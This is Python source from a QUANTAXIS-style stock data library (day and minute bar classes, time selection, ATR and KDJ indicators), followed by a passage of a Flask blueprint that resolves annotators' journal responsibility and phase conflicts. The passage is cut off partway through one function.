return self.sync_status(QA_DataStruct_Index_day(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>=']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_day(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_day(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_day(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_day((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_day((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Index_min(stock_hq_base):
'自定义的日线数据结构'
def __init__(self, DataFrame):
self.type = 'index_min'
self.if_fq = ''
self.mongo_coll = QA_Setting.client.quantaxis.stock_min
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = DataFrame['date']
self.data = DataFrame
self.datetime = self.data.index.levels[self.data.index.names.index(
'datetime')]
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def len(self):
return len(self.data)
def reverse(self):
return QA_DataStruct_Index_min(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, QA_DataStruct_Index_min):
'固定的状态要同步 尤其在创建新的datastruct时候'
(QA_DataStruct_Index_min.if_fq, QA_DataStruct_Index_min.type, QA_DataStruct_Index_min.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return QA_DataStruct_Index_min
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except:
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_min(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_min(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>=']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Index_min(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_min(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_min(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Index_min((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Index_min((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Stock_min(stock_hq_base):
def __init__(self, DataFrame):
self.type = 'stock_min'
self.if_fq = 'bfq'
self.mongo_coll = QA_Setting.client.quantaxis.stock_min
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = DataFrame['date']
self.data = DataFrame
self.datetime = self.data.index.levels[self.data.index.names.index(
'datetime')]
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def to_qfq(self):
if self.if_fq is 'bfq':
data = QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: QA_data_stock_to_fq(
self.data[self.data['code'] == x]), self.code))).set_index(['datetime', 'code'], drop=False))
data.if_fq = 'qfq'
return data
else:
QA_util_log_info(
'none support type for qfq Current type is:%s' % self.if_fq)
return self
def to_hfq(self):
if self.if_fq is 'bfq':
data = QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: QA_data_stock_to_fq(
self.data[self.data['code'] == x], '01'), self.code))).set_index(['datetime', 'code'], drop=False))
data.if_fq = 'hfq'
return data
else:
QA_util_log_info(
'none support type for qfq Current type is:%s' % self.if_fq)
return self
def ATR(self, gap=14):
list_mtr = []
__id = -gap
while __id < 0:
list_mtr.append(max(self.high[__id] - self.low[__id], abs(
self.close[__id - 1] - self.high[__id]), abs(self.close[__id - 1] - self.low[__id])))
__id += 1
res = talib.MA(np.array(list_mtr), gap)
return list_mtr[-1], res[-1]
def KDJ(self, N=9, M1=3, M2=3):
# https://www.joinquant.com/post/142 先计算KD
__K, __D = talib.STOCHF(np.array(self.high[-(N + M1 + M2 + 1):]), np.array(self.low[-(
N + M1 + M2 + 1):]), np.array(self.close[-(N + M1 + M2 + 1):]), N, M2, fastd_matype=0)
K = np.array(
list(map(lambda x: SMA(__K[:x], M1), range(1, len(__K) + 1))))
D = np.array(list(map(lambda x: SMA(K[:x], M2), range(1, len(K) + 1))))
J = K * 3 - D * 2
return K[-1], D[-1], J[-1]
def JLHB(self, N=7, M=5):
pass
def len(self):
return len(self.data)
def reverse(self):
return QA_DataStruct_Stock_min(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, QA_DataStruct_Stock_min):
'固定的状态要同步 尤其在创建新的datastruct时候'
(QA_DataStruct_Stock_min.if_fq, QA_DataStruct_Stock_min.type, QA_DataStruct_Stock_min.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return QA_DataStruct_Stock_min
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except:
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_min(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_min(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>=']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_min(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_min(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_min((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_min((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Stock_day(stock_hq_base):
def __init__(self, DataFrame):
self.data = DataFrame
self.type = 'stock_day'
self.if_fq = 'bfq'
self.mongo_coll = QA_Setting.client.quantaxis.stock_day
self.open = DataFrame['open']
self.high = DataFrame['high']
self.low = DataFrame['low']
self.close = DataFrame['close']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = self.data.index.levels[self.data.index.names.index('date')]
self.index = DataFrame.index
self.code = self.data.index.levels[self.data.index.names.index('code')]
def to_qfq(self):
if self.if_fq is 'bfq':
data = QA_DataStruct_Stock_day(pd.concat(list(map(
lambda x: QA_data_stock_to_fq(self.data[self.data['code'] == x]), self.code))))
data.if_fq = 'qfq'
return data
else:
QA_util_log_info(
'none support type for qfq Current type is: %s' % self.if_fq)
return self
def to_hfq(self):
if self.if_fq is 'bfq':
data = QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: QA_data_stock_to_fq(
self.data[self.data['code'] == x], '01'), self.code))))
data.if_fq = 'hfq'
return data
else:
QA_util_log_info(
'none support type for qfq Current type is: %s' % self.if_fq)
return self
def len(self):
return len(self.data)
def reverse(self):
return QA_DataStruct_Stock_day(self.data[::-1])
def show(self):
return QA_util_log_info(self.data)
def query(self, query_text):
return self.data.query(query_text)
def to_list(self):
return np.asarray(self.data).tolist()
def to_pd(self):
return self.data
def to_numpy(self):
return np.asarray(self.data)
def to_json(self):
return QA_util_to_json_from_pandas(self.data)
def sync_status(self, QA_DataStruct_Stock_day):
'固定的状态要同步 尤其在创建新的datastruct时候'
(QA_DataStruct_Stock_day.if_fq, QA_DataStruct_Stock_day.type, QA_DataStruct_Stock_day.mongo_coll) = (
self.if_fq, self.type, self.mongo_coll)
return QA_DataStruct_Stock_day
def splits(self):
if self.type in ['stock_day', 'index_day']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['date', 'code'], drop=False)), self.code))))
elif self.type in ['stock_min','index_min']:
return list(map(lambda data: self.sync_status(data), list(map(lambda x: (
self.data[self.data['code'] == x].set_index(['datetime', 'code'], drop=False)), self.code))))
def add_func(self, func, *arg, **kwargs):
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: func(
self.data[self.data['code'] == x], *arg, **kwargs), self.code)))))
def pivot(self, column_):
assert isinstance(column_, str)
try:
return self.data.pivot(index='datetime', columns='code', values=column_)
except:
return self.data.pivot(index='date', columns='code', values=column_)
def select_time(self, start, end):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_day(self.data[self.data['date'] >= start][self.data['date'] <= end].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_day(self.data[self.data['datetime'] >= start][self.data['datetime'] <= end].set_index(['datetime', 'code'], drop=False)))
def select_time_with_gap(self, time, gap, method):
if method in ['gt', '>=']:
def __gt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] > time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] > time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __gt(x), self.splits())))))
elif method in ['gte', '>']:
def __gte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] >= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] >= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __gte(x), self.splits())))))
elif method in ['lt', '<']:
def __lt(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] < time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] < time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __lt(x), self.splits())))))
elif method in ['lte', '<=']:
def __lte(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] <= time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] <= time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __lte(x), self.splits())))))
elif method in ['e', '==', '=', 'equal']:
def __eq(__dataS):
if self.type in ['stock_day', 'index_day']:
return __dataS.data[__dataS.data['date'] == time].head(gap).set_index(['date', 'code'], drop=False)
elif self.type in ['stock_min','index_min']:
return __dataS.data[__dataS.data['datetime'] == time].head(gap).set_index(['datetime', 'code'], drop=False)
return self.sync_status(QA_DataStruct_Stock_day(pd.concat(list(map(lambda x: __eq(x), self.splits())))))
def select_code(self, code):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_day(self.data[self.data['code'] == code].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_day(self.data[self.data['code'] == code].set_index(['datetime', 'code'], drop=False)))
def get_bar(self, code, time):
if self.type in ['stock_day', 'index_day']:
return self.sync_status(QA_DataStruct_Stock_day((self.data[self.data['code'] == code])[self.data['date'] == str(time)[0:10]].set_index(['date', 'code'], drop=False)))
elif self.type in ['stock_min','index_min']:
return self.sync_status(QA_DataStruct_Stock_day((self.data[self.data['code'] == code])[self.data['datetime'] == str(time)[0:19]].set_index(['datetime', 'code'], drop=False)))
class QA_DataStruct_Stock_transaction():
def __init__(self, DataFrame):
self.type = 'stock_transaction'
self.if_fq = 'None'
self.mongo_coll = QA_Setting.client.quantaxis.stock_transaction
self.buyorsell = DataFrame['buyorsell']
self.price = DataFrame['price']
if 'volume' in DataFrame.columns:
self.vol = DataFrame['volume']
else:
self.vol = DataFrame['vol']
self.date = DataFrame['date']
self.time = DataFrame['time']
self.datetime = DataFrame['datetime']
self.order = DataFrame['order']
self.index = DataFrame.index
self.data = DataFrame
def resample(self, type_='1min'):
return QA_DataStruct_Stock_min(QA_data_tick_resample(self.data, type_))
class QA_DataStruct_Market_reply():
pass
class QA_DataStruct_Market_bid():
pass
class QA_DataStruct_Market_bid_queue():
pass
class QA_DataStruct_ARP_account():
pass
class QA_DataStruct_Quantaxis_error():
pass
| 48.663403 | 186 | 0.600332 | 5,327 | 39,758 | 4.232964 | 0.035667 | 0.07415 | 0.05304 | 0.05987 | 0.944077 | 0.927003 | 0.92319 | 0.917513 | 0.913788 | 0.906559 | 0 | 0.002839 | 0.23799 | 39,758 | 816 | 187 | 48.723039 | 0.741451 | 0.006665 | 0 | 0.775264 | 0 | 0 | 0.105627 | 0 | 0 | 0 | 0 | 0 | 0.007541 | 1 | 0.180995 | false | 0.00905 | 0.016591 | 0.069382 | 0.496229 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
380be2740d905c61f78ac9f7c17938a01132845a | 19,049 | py | Python | annotation_web_client/conflict.py | levon003/icwsm-cancer-journeys | f0b39f80380ace20912e989964475056be27ebc5 | [
"MIT"
] | null | null | null | annotation_web_client/conflict.py | levon003/icwsm-cancer-journeys | f0b39f80380ace20912e989964475056be27ebc5 | [
"MIT"
] | null | null | null | annotation_web_client/conflict.py | levon003/icwsm-cancer-journeys | f0b39f80380ace20912e989964475056be27ebc5 | [
"MIT"
] | null | null | null | from flask import (
Blueprint, flash, g, redirect, render_template, request, url_for, make_response
)
from werkzeug.exceptions import abort
from annotation_web_client.auth import login_required
from annotation_web_client.db import get_db
from annotation_web_client.annotate import get_journal_annotations
from annotation_web_client.site_df import get_site_df, get_journals, get_journals_user_dict
from annotation_web_client.sites import view_site
from annotation_web_client.journal_db import get_journal_db
bp = Blueprint('conflict', __name__)
@bp.route('/conflict/journal/responsibilities/', methods=('GET',))
def view_journal_responsibility_conflict_summary():
db = get_db()
users = db.execute(
'SELECT username FROM user'
).fetchall()
username_list = [user['username'] for user in users]
user_list = []
for username in username_list:
cursor = db.execute(
"""SELECT COUNT(*) AS responsibility_count FROM (
SELECT site_id, journal_oid
FROM journalAnnotation
WHERE username = ? AND annotation_type = ?
GROUP BY site_id, journal_oid, annotation_type, username)""",
(username, 'journal_patient_responsibilities'))
responsibility_count = cursor.fetchone()['responsibility_count']
if responsibility_count > 0:
user_list.append({'username': username, 'responsibility_count': responsibility_count})
user_list.sort(key=lambda user: user['responsibility_count'], reverse=True)
return render_template('conflict/journalResponsibilityConflictSummary.html', annotator_list=user_list)
@bp.route('/conflict/journal/responsibilities/<user1>/vs/<user2>', methods=('GET',))
def view_journal_responsibility_conflicts(user1, user2):
try:
responsibilities1 = get_journal_annotations('journal_patient_responsibilities', user1)
responsibilities2 = get_journal_annotations('journal_patient_responsibilities', user2)
except:
return f"Failed to load journal phase annotations for users '{user1}' and '{user2}'."
journal_db = get_journal_db()
responsibility_dict1 = {}
responsibility_dict2 = {}
for responsibility_annotation in responsibilities1:
key = f"{responsibility_annotation['site_id']}|{responsibility_annotation['journal_oid']}"
responsibility_dict1[key] = responsibility_annotation['data']
for responsibility_annotation in responsibilities2:
key = f"{responsibility_annotation['site_id']}|{responsibility_annotation['journal_oid']}"
responsibility_dict2[key] = responsibility_annotation['data']
conflict_list = []
common_journal_keys = set(responsibility_dict1.keys()).intersection(set(responsibility_dict2.keys()))
for key in common_journal_keys:
data1 = responsibility_dict1[key]
data2 = responsibility_dict2[key]
r1 = set(data1.split("|"))
r2 = set(data2.split("|"))
if r1 != r2:
# this is a conflict
site_id, journal_oid = key.split("|")
in_common = ", ".join(list(r1 & r2))
user1_only = ", ".join(list(r1 - r2))
user2_only = ", ".join(list(r2 - r1))
journal_index = journal_db.execute("""
SELECT site_index
FROM journalMetadata
WHERE site_id = ? AND journal_oid = ?
""", (site_id, journal_oid)).fetchone()['site_index']
resolution = get_journal_annotation_conflict_resolution('journal_patient_responsibilities',
site_id,
journal_oid)
resolved = False
correct_username = ""
if resolution is not None:
# Only consider the situation resolved if a correct username was provided
resolved = resolution['resolution_type'] == 'username'
if resolved:
correct_username = resolution['correct_username'].strip()
conflict = {"site_id": site_id,
"journal_oid": journal_oid,
"journal_index": journal_index,
"user1_responsibility_list": r1,
"user2_responsibility_list": r2,
"in_common": in_common,
"user1_only": user1_only,
"user2_only": user2_only,
"conflict_resolved": resolved,
"correct_username": correct_username
}
conflict_list.append(conflict)
# sort the conflict_list based on the site_id and the journal_index
conflict_list.sort(key=lambda conflict: (conflict['site_id'], conflict['journal_index']))
return render_template('conflict/journalResponsibilityConflictPair.html',
user1=user1,
user2=user2,
conflict_list=conflict_list)
@bp.route('/conflict/journal/responsibilities/<user1>/vs/<user2>/site/<int:site_id>', methods=('GET', 'POST'))
def view_site_journal_responsibility_conflicts(user1, user2, site_id):
if request.method == 'POST':
# intercept POSTs that are for conflict-resolution of journal phase annotations
if 'conflict_type' in request.form and request.form['conflict_type'] == 'journal_patient_responsibilities':
journal_oid = request.form['journal_oid']
correct_username = request.form['correct_username']
set_journal_annotation_conflict_resolution('journal_patient_responsibilities',
site_id,
journal_oid,
correct_username)
return make_response("OK", 200)
# This isn't a conflict-resolution post, so let view_site handle it.
return view_site(site_id)
# This is a GET request
try:
responsibilities1 = get_journal_annotations('journal_patient_responsibilities', user1)
responsibilities2 = get_journal_annotations('journal_patient_responsibilities', user2)
except:
return f"Failed to load journal phase annotations for users '{user1}' and '{user2}'."
journal_db = get_journal_db()
responsibility_dict1 = {}
responsibility_dict2 = {}
for responsibility_annotation in responsibilities1:
if responsibility_annotation['site_id'] != site_id:
continue
key = responsibility_annotation['journal_oid']
responsibility_dict1[key] = responsibility_annotation['data']
for responsibility_annotation in responsibilities2:
if responsibility_annotation['site_id'] != site_id:
continue
key = responsibility_annotation['journal_oid']
responsibility_dict2[key] = responsibility_annotation['data']
conflict_list = []
common_journal_keys = set(responsibility_dict1.keys()).intersection(set(responsibility_dict2.keys()))
for key in common_journal_keys:
data1 = responsibility_dict1[key]
data2 = responsibility_dict2[key]
r1 = set(data1.split("|"))
r2 = set(data2.split("|"))
if r1 != r2:
# this is a conflict
journal_oid = key
in_common = ", ".join(list(r1 & r2))
user1_only = ", ".join(list(r1 - r2))
user2_only = ", ".join(list(r2 - r1))
journal_index = journal_db.execute("""
SELECT site_index
FROM journalMetadata
WHERE site_id = ? AND journal_oid = ?
""", (site_id, journal_oid)).fetchone()['site_index']
resolution = get_journal_annotation_conflict_resolution('journal_patient_responsibilities',
site_id,
journal_oid)
resolved = False
correct_username = ""
if resolution is not None:
# Only consider the situation resolved if a correct username was provided
resolved = resolution['resolution_type'] == 'username'
if resolved:
correct_username = resolution['correct_username'].strip()
conflict = {"site_id": site_id,
"journal_oid": journal_oid,
"journal_index": journal_index,
"user1_responsibility_list": data1,
"user2_responsibility_list": data2,
"in_common": in_common,
"user1_only": user1_only,
"user2_only": user2_only,
"conflict_resolved": resolved,
"correct_username": correct_username}
conflict_list.append(conflict)
# sort the conflict_list based on the site_id and the journal_index
conflict_list.sort(key=lambda conflict: (conflict['site_id'], conflict['journal_index']))
return view_site(site_id, user1=user1, user2=user2, responsibility_conflict_list=conflict_list)
@bp.route('/conflict/journal/phases/', methods=('GET',))
def view_journal_phase_conflict_summary():
db = get_db()
users = db.execute(
'SELECT username FROM user'
).fetchall()
username_list = [user['username'] for user in users]
user_list = []
for username in username_list:
cursor = db.execute(
"""SELECT COUNT(*) AS phase_count FROM (
SELECT site_id, journal_oid
FROM journalAnnotation
WHERE username = ? AND annotation_type = ?
GROUP BY site_id, journal_oid, annotation_type, username)""",
(username, 'journal_journey_phase'))
phase_count = cursor.fetchone()['phase_count']
if phase_count > 0:
user_list.append({'username': username, 'phase_count': phase_count})
user_list.sort(key=lambda user: user['phase_count'], reverse=True)
return render_template('conflict/journalPhaseConflictSummary.html', annotator_list=user_list)
@bp.route('/conflict/journal/phases/<user1>/vs/<user2>', methods=('GET',))
def view_journal_phase_conflicts(user1, user2):
try:
phases1 = get_journal_annotations('journal_journey_phase', user1)
phases2 = get_journal_annotations('journal_journey_phase', user2)
except:
return f"Failed to load journal phase annotations for users '{user1}' and '{user2}'."
journal_db = get_journal_db()
phase_dict1 = {}
phase_dict2 = {}
for phase_annotation in phases1:
key = f"{phase_annotation['site_id']}|{phase_annotation['journal_oid']}"
phase_dict1[key] = phase_annotation['data']
for phase_annotation in phases2:
